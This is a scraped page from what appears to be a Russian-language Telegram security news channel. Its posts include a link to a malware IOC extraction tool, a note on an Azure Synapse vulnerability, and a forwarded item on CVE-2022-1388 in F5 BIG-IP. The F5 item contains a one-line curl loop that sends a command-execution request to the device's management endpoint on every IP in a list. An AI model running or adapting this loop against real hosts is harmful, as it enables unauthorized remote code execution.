Похек
16.6K subscribers
2.18K photos
114 videos
243 files
3.15K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Отдыхаем, сегодня постов не будет
С 9 мая! С Днем Победы!
🔥8
Lupo — Malware IOC Extractor
Отладочный модуль для автоматизации анализа вредоносных программ. Пошаговую инструкцию по использованию Lupo с изображениями и инструкциями ознакомиться здесь.
https://github.com/malienist/lupo

Дневник Безопасника 🛡
Forwarded from iMelnik
Twitter гремит о CVE-2022-1388 она же RCE в F5 BIG-IP(сервиса для доставки приложений).
Всё гениальное как и всегда оказалось простым, POST запрос и JSON...🤭
пример простого скрипта чтобы пробежаться по множеству IP и проверить их на уязвимость ;)

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

ну и сам PoC для тех кому интересно
A vulnerability (CVE-2022-29972) in Microsoft Azure Synapse and Azure Data Factory could have led to remote code execution attacks, allowing attackers to gain control of other Synapse workspaces and leak sensitive data, including Azure service keys and API tokens, as well as passwords for other services.
▶️ Источник

Дневник Безопасника 🛡